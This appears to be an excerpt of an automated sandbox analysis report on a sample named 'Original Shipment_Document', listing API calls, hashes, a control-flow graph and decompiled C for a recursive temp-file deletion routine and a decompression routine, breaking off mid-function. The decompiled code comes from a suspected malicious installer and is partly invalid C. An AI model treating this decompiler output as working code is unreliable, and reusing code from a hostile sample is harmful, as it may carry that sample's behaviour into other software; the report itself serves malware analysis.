                                                0x6eac22ba
                                                0x6eac22c0
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eac22c0
                                                0x6eac2286
                                                0x6eac228d
                                                0x6eac2293
                                                0x6eac2299
                                                0x00000000
                                                0x6eac2299
                                                0x6eac1e9d
                                                0x6eac1e9e
                                                0x6eac225d
                                                0x6eac225d
                                                0x6eac2263
                                                0x6eac2266
                                                0x00000000
                                                0x00000000
                                                0x6eac226d
                                                0x6eac2272
                                                0x00000000
                                                0x6eac2272
                                                0x6eac1ea5
                                                0x00000000
                                                0x00000000
                                                0x6eac1eab
                                                0x6eac1eab
                                                0x6eac1eb4
                                                0x6eac1eb9
                                                0x6eac1ebf
                                                0x00000000
                                                0x00000000
                                                0x6eac1ec5
                                                0x6eac1ed2
                                                0x6eac1ed8
                                                0x6eac1ee2
                                                0x6eac1ee8
                                                0x6eac1ef0
                                                0x6eac1f00
                                                0x00000000
                                                0x6eac1f00

                                                APIs
                                                  • Part of subcall function 6EAC12BB: GlobalAlloc.KERNELBASE(00000040,?,6EAC12DB,?,6EAC137F,00000019,6EAC11CA,-000000A0), ref: 6EAC12C5
                                                • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 6EAC1D2D
                                                • lstrcpyW.KERNEL32 ref: 6EAC1D75
                                                • lstrcpyW.KERNEL32 ref: 6EAC1D7F
                                                • GlobalFree.KERNEL32 ref: 6EAC1D92
                                                • GlobalFree.KERNEL32 ref: 6EAC1E74
                                                • GlobalFree.KERNEL32 ref: 6EAC1E79
                                                • GlobalFree.KERNEL32 ref: 6EAC1E7E
                                                • GlobalFree.KERNEL32 ref: 6EAC2068
                                                • lstrcpyW.KERNEL32 ref: 6EAC2222
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 6EAC22A1
                                                • LoadLibraryW.KERNEL32(00000008), ref: 6EAC22B2
                                                • GetProcAddress.KERNEL32(?,?), ref: 6EAC230C
                                                • lstrlenW.KERNEL32(00000808), ref: 6EAC2326
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.520623463.000000006EAC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6EAC0000, based on PE: true
                                                • Associated: 00000000.00000002.520610261.000000006EAC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520638610.000000006EAC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                • Associated: 00000000.00000002.520646374.000000006EAC6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6eac0000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: f8c949f5f50e5715b972a5699a9372a8da73fa6bac119045a1d288ee0fbec4a4
                                                • Instruction ID: 81b7c1d3002a1d43e3cc8a145175cb4333239f4e52d9ce403c68671d4ac7384b
                                                • Opcode Fuzzy Hash: f8c949f5f50e5715b972a5699a9372a8da73fa6bac119045a1d288ee0fbec4a4
                                                • Instruction Fuzzy Hash: A522CD70E14A06DEDB508FE9C4806FDB7F0FF1AB09F24452AD1A5E3240D77459CA8B6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00405C13 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148filestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 720 405c13-405c39 call 405ede 723 405c52-405c59 720->723 724 405c3b-405c4d DeleteFileW 720->724 726 405c5b-405c5d 723->726 727 405c6c-405c7c call 406507 723->727 725 405dcf-405dd3 724->725 728 405c63-405c66 726->728 729 405d7d-405d82 726->729 733 405c8b-405c8c call 405e22 727->733 734 405c7e-405c89 lstrcatW 727->734 728->727 728->729 729->725 731 405d84-405d87 729->731 735 405d91-405d99 call 40683d 731->735 736 405d89-405d8f 731->736 737 405c91-405c95 733->737 734->737 735->725 744 405d9b-405daf call 405dd6 call 405bcb 735->744 736->725 740 405ca1-405ca7 lstrcatW 737->740 741 405c97-405c9f 737->741 743 405cac-405cc8 lstrlenW FindFirstFileW 740->743 741->740 741->743 745 405d72-405d76 743->745 746 405cce-405cd6 743->746 760 405db1-405db4 744->760 761 405dc7-405dca call 405569 744->761 745->729 748 405d78 745->748 749 405cf6-405d0a call 406507 746->749 750 405cd8-405ce0 746->750 748->729 762 405d21-405d2c call 405bcb 749->762 763 405d0c-405d14 749->763 752 405ce2-405cea 750->752 753 405d55-405d65 FindNextFileW 750->753 752->749 756 405cec-405cf4 752->756 753->746 759 405d6b-405d6c FindClose 753->759 756->749 756->753 759->745 760->736 766 405db6-405dc5 call 405569 call 4062c7 760->766 761->725 773 405d4d-405d50 call 405569 762->773 774 405d2e-405d31 762->774 763->753 767 405d16-405d1f call 405c13 763->767 766->725 767->753 773->753 776 405d33-405d43 call 405569 call 4062c7 774->776 777 405d45-405d4b 774->777 776->753 777->753
                                                C-Code - Quality: 98%
                                                			E00405C13(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405EDE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406507(0x425710, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405E22(_t68);
					} else {
						lstrcatW(0x425710, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425710,  &_v604);
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406507(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405BCB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405569(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E00405569(0xfffffff1, _t68);
											E004062C7(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405C13(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425710 - 0x5c;
					if( *0x425710 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040683D(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405DD6(_t68);
							_t38 = E00405BCB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405569(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405569(0xfffffff1, _t68);
							return E004062C7(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}


















                                                0x00405c1d
                                                0x00405c22
                                                0x00405c2b
                                                0x00405c2e
                                                0x00405c36
                                                0x00405c39
                                                0x00405c3c
                                                0x00405c44
                                                0x00405c46
                                                0x00405c47
                                                0x00000000
                                                0x00405c47
                                                0x00405c52
                                                0x00405c55
                                                0x00405c55
                                                0x00405c55
                                                0x00405c59
                                                0x00405c6c
                                                0x00405c73
                                                0x00405c78
                                                0x00405c7c
                                                0x00405c8c
                                                0x00405c7e
                                                0x00405c84
                                                0x00405c84
                                                0x00405c91
                                                0x00405c95
                                                0x00405ca1
                                                0x00405ca7
                                                0x00405cac
                                                0x00405cb2
                                                0x00405cbd
                                                0x00405cc3
                                                0x00405cc5
                                                0x00405cc8
                                                0x00405d72
                                                0x00405d72
                                                0x00405d76
                                                0x00405d78
                                                0x00405d78
                                                0x00405d78
                                                0x00405d78
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405cce
                                                0x00405cce
                                                0x00405cce
                                                0x00405cd6
                                                0x00405cf6
                                                0x00405cfe
                                                0x00405d03
                                                0x00405d0a
                                                0x00405d25
                                                0x00405d2a
                                                0x00405d2c
                                                0x00405d50
                                                0x00405d2e
                                                0x00405d2e
                                                0x00405d31
                                                0x00405d45
                                                0x00405d33
                                                0x00405d36
                                                0x00405d3e
                                                0x00405d3e
                                                0x00405d31
                                                0x00405d0c
                                                0x00405d12
                                                0x00405d14
                                                0x00405d1a
                                                0x00405d1a
                                                0x00405d14
                                                0x00000000
                                                0x00405d0a
                                                0x00405cd8
                                                0x00405ce0
                                                0x00000000
                                                0x00000000
                                                0x00405ce2
                                                0x00405cea
                                                0x00000000
                                                0x00000000
                                                0x00405cec
                                                0x00405cf4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405d55
                                                0x00405d5d
                                                0x00405d63
                                                0x00405d63
                                                0x00405d6c
                                                0x00000000
                                                0x00405d6c
                                                0x00405c97
                                                0x00405c9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c5b
                                                0x00405c5b
                                                0x00405c5d
                                                0x00405d7d
                                                0x00405d7f
                                                0x00405d82
                                                0x00405dd3
                                                0x00405dd3
                                                0x00405dd3
                                                0x00405d84
                                                0x00405d87
                                                0x00405d92
                                                0x00405d97
                                                0x00405d99
                                                0x00000000
                                                0x00000000
                                                0x00405d9c
                                                0x00405da8
                                                0x00405dad
                                                0x00405daf
                                                0x00000000
                                                0x00405dca
                                                0x00405db1
                                                0x00405db4
                                                0x00000000
                                                0x00000000
                                                0x00405db9
                                                0x00000000
                                                0x00405dc0
                                                0x00405d89
                                                0x00405d89
                                                0x00000000
                                                0x00405d89
                                                0x00405c63
                                                0x00405c66
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00405c66

                                                APIs
                                                • DeleteFileW.KERNELBASE(?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C3C
                                                • lstrcatW.KERNEL32(00425710,\*.*), ref: 00405C84
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405CA7
                                                • lstrlenW.KERNEL32(?,?,0040A014,?,00425710,?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CAD
                                                • FindFirstFileW.KERNEL32(00425710,?,?,?,0040A014,?,00425710,?,?,7620FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CBD
                                                • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D5D
                                                • FindClose.KERNEL32(00000000), ref: 00405D6C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.519250714.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.519237934.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519280685.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519295623.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519370433.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519382057.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519398577.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519410549.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519420801.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.519429191.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Original Shipment_Document.jbxd
                                                Similarity
                                                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                                                • API String ID: 2035342205-2110562171
                                                • Opcode ID: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                • Instruction ID: 7f21bfa76759dd048c017f5e8d67b30635c21f713a141b53f9c1cb2b61cba077
                                                • Opcode Fuzzy Hash: d9acfb67b6692fe63fef00afaeab71217e0c0e788268e2aa2b253bff87fc1474
                                                • Instruction Fuzzy Hash: BD419F30400A15BADB21AB619C8DAAF7B78EF41718F14817BF801721D1D77C4A82DEAE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00406BFE Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 98%
                                                			E00406BFE() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4)); // executed
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
